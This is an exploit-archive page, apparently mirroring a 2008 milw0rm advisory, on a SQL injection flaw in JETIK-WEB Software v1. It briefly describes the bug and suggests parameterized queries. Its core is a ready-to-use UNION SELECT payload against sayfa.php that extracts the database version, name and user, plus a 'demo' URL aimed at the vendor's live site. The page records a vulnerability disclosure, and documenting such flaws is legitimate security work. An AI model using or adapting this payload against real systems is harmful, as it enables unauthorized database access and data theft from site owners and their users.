header-logo
Suggest Exploit
vendor:
Jetik-WEB Software
by:
d3v1l
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jetik-WEB Software
Affected Version From: v1
Affected Version To: v1
Patch Exists: NO
Related CWE: N/A
CPE: a:jetik:jetik-web_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

JETIK-WEB Software v1 – SQL Injection Vulnerability

A SQL injection vulnerability exists in JETIK-WEB Software v1. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate the data in the database, disclose sensitive information, or even gain access to the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~]-----------------------------------------------------------
[~] JETIK-WEB Software v1 - SQL Injection Vulnerability
[~]
[~] http://www.jetik.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 22.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~] Demo :-
[~]
[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
[~]
[~]--------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-09-23]